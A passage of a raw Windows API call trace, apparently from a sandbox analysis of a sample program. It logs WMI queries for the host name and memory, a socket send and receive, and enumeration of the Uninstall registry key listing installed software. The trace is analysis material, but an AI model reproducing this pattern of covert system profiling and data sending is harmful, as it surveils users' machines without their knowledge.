[1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0214.930] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e138 | out: ppvObject=0x36e138*=0x5e8a324) returned 0x0 [0214.931] IMarshal:GetUnmarshalClass (in: This=0x5e8a324, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e140 | out: pCid=0x36e140*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.931] IUnknown:Release (This=0x5e8a324) returned 0x3 [0214.931] CoGetContextToken (in: pToken=0x36e198 | out: pToken=0x36e198) returned 0x0 [0214.931] CoGetContextToken (in: pToken=0x36e5ac | out: pToken=0x36e5ac) returned 0x0 [0214.931] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e62c | out: ppvObject=0x36e62c*=0x0) returned 0x80004002 [0214.931] IUnknown:Release (This=0x5e8a320) returned 0x2 [0214.931] CoGetContextToken (in: pToken=0x36eb94 | out: pToken=0x36eb94) returned 0x0 [0214.931] CoGetContextToken (in: pToken=0x36eaf4 | out: pToken=0x36eaf4) returned 0x0 [0214.931] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x36ebc4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36ebc0 | out: ppvObject=0x36ebc0*=0x5e8a320) returned 0x0 [0214.931] IUnknown:AddRef (This=0x5e8a320) returned 0x4 [0214.931] IUnknown:Release (This=0x5e8a320) returned 0x3 [0214.931] IUnknown:Release (This=0x5e8a320) returned 0x2 [0214.931] CoTaskMemFree (pv=0x769398) [0214.932] CoGetContextToken (in: pToken=0x36ef04 | out: pToken=0x36ef04) returned 0x0 [0214.932] IUnknown:AddRef (This=0x5e8a320) returned 0x3 [0214.932] IWbemClassObject:Get (in: This=0x5e8a320, wszName="__GENUS", lFlags=0, pVal=0x36f204*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f284*=0, plFlavor=0x36f280*=0 | out: pVal=0x36f204*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f284*=3, plFlavor=0x36f280*=64) returned 0x0 [0214.932] IWbemClassObject:Get (in: This=0x5e8a320, wszName="__PATH", lFlags=0, pVal=0x36f1e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f26c*=0, plFlavor=0x36f268*=0 | out: pVal=0x36f1e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"", varVal2=0x0), pType=0x36f26c*=8, plFlavor=0x36f268*=64) returned 0x0 [0214.932] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"") returned 0x82 [0214.932] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"") returned 0x82 [0214.932] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f214 | out: ppv=0x36f214*=0x6ee4bc) returned 0x0 [0214.933] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f20c | out: pAptType=0x36f20c*=1) returned 0x0 [0214.933] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f210 | out: ppvObject=0x36f210*=0x0) returned 0x80004002 [0214.933] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0214.934] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb80 | out: ppv=0x36eb80*=0x769398) returned 0x0 [0214.934] WbemDefPath:IUnknown:QueryInterface (in: This=0x769398, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed98 | out: ppvObject=0x36ed98*=0x0) returned 0x80004002 [0214.934] WbemDefPath:IClassFactory:CreateInstance (in: This=0x769398, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36eda4 | out: ppvObject=0x36eda4*=0x768d68) returned 0x0 [0214.934] WbemDefPath:IUnknown:Release (This=0x769398) returned 0x0 [0214.934] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9c4 | out: ppvObject=0x36e9c4*=0x768d68) returned 0x0 [0214.934] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e978 | out: ppvObject=0x36e978*=0x0) returned 0x80004002 [0214.935] WbemDefPath:IUnknown:AddRef (This=0x768d68) returned 0x3 [0214.935] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e2d4 | out: ppvObject=0x36e2d4*=0x0) returned 0x80004002 [0214.935] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0214.935] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e290 | out: ppvObject=0x36e290*=0x769448) returned 0x0 [0214.935] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x769448, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e298 | out: pCid=0x36e298*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.935] WbemDefPath:IUnknown:Release (This=0x769448) returned 0x3 [0214.935] CoGetContextToken (in: pToken=0x36e2f0 | out: pToken=0x36e2f0) returned 0x0 [0214.935] CoGetContextToken (in: pToken=0x36e704 | out: pToken=0x36e704) returned 0x0 [0214.935] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e784 | out: ppvObject=0x36e784*=0x0) returned 0x80004002 [0214.935] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x2 [0214.935] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x1 [0214.935] CoGetContextToken (in: pToken=0x36f094 | out: pToken=0x36f094) returned 0x0 [0214.935] CoGetContextToken (in: pToken=0x36eff4 | out: pToken=0x36eff4) returned 0x0 [0214.935] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x36f0c4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f0c0 | out: ppvObject=0x36f0c0*=0x768d68) returned 0x0 [0214.936] WbemDefPath:IUnknown:AddRef (This=0x768d68) returned 0x3 [0214.936] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x2 [0214.936] WbemDefPath:IWbemPath:SetText (This=0x768d68, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"Q9IATRKPRH\"") returned 0x0 [0214.936] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f240 | out: puCount=0x36f240*=0x2) returned 0x0 [0214.936] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f23c*=0x0, pszText=0x0 | out: puBuffLength=0x36f23c*=0xf, pszText=0x0) returned 0x0 [0214.936] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f23c*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f23c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.936] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f20c | out: puCount=0x36f20c*=0x2) returned 0x0 [0214.936] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f208*=0x0, pszText=0x0 | out: puBuffLength=0x36f208*=0xf, pszText=0x0) returned 0x0 [0214.936] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f208*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f208*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.936] IWbemClassObject:Get (in: This=0x5e8a320, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x36f208*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24535e0*=0, plFlavor=0x24535e4*=0 | out: pVal=0x36f208*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096624", varVal2=0x0), pType=0x24535e0*=21, plFlavor=0x24535e4*=0) returned 0x0 [0214.937] SysStringByteLen (bstr="2096624") returned 0xe [0214.937] SysStringByteLen (bstr="2096624") returned 0xe [0214.937] IWbemClassObject:Get (in: This=0x5e8a320, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x36f210*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24535e0*=21, plFlavor=0x24535e4*=0 | out: pVal=0x36f210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096624", varVal2=0x0), pType=0x24535e0*=21, plFlavor=0x24535e4*=0) returned 0x0 [0214.937] SysStringByteLen (bstr="2096624") returned 0xe [0214.937] SysStringByteLen (bstr="2096624") returned 0xe [0214.940] CoTaskMemAlloc (cb=0x4) returned 0x7694e8 [0214.940] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x7694e8, puReturned=0x2452d38 | out: apObjects=0x7694e8*=0x0, puReturned=0x2452d38*=0x0) returned 0x1 [0214.941] CoTaskMemFree (pv=0x7694e8) [0214.941] CoGetContextToken (in: pToken=0x36f138 | out: pToken=0x36f138) returned 0x0 [0214.941] IUnknown:Release (This=0x70f9f0) returned 0x1 [0214.941] IUnknown:Release (This=0x70f9f0) returned 0x0 [0214.942] CoGetContextToken (in: pToken=0x36f138 | out: pToken=0x36f138) returned 0x0 [0214.942] IUnknown:Release (This=0x70f928) returned 0x1 [0214.943] IUnknown:Release (This=0x70f928) returned 0x0 [0214.951] CoCreateGuid (in: pguid=0x36ef68 | out: pguid=0x36ef68*(Data1=0xa1e5fe13, Data2=0xe99a, Data3=0x4535, Data4=([0]=0x8e, [1]=0x92, [2]=0xa1, [3]=0xc4, [4]=0xc4, [5]=0xfd, [6]=0xd8, [7]=0xd3))) returned 0x0 [0214.951] CoCreateGuid (in: pguid=0x36eeac | out: pguid=0x36eeac*(Data1=0xf6f40c98, Data2=0x578b, Data3=0x4430, Data4=([0]=0xbe, [1]=0x87, [2]=0xe1, [3]=0x88, [4]=0xa1, [5]=0x8d, [6]=0x49, [7]=0x42))) returned 0x0 [0215.059] send (s=0x264, buf=0x23b35e3*, len=292, flags=0) returned 292 [0215.060] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0215.231] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x354) returned 0x0 [0215.233] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x36f2dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x36f2d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x36f2dc*=0x2b, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x36f2d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.233] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.233] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.233] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x9, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0xa, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0xb, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0xc, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.234] RegEnumKeyExW (in: hKey=0x354, dwIndex=0xd, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0xe, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0xf, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x10, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x11, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x12, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x13, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x14, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x15, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x16, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x17, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x18, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.235] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x19, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1a, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1b, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1c, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1d, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1e, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1f, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x20, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x21, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.236] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x22, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x23, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: 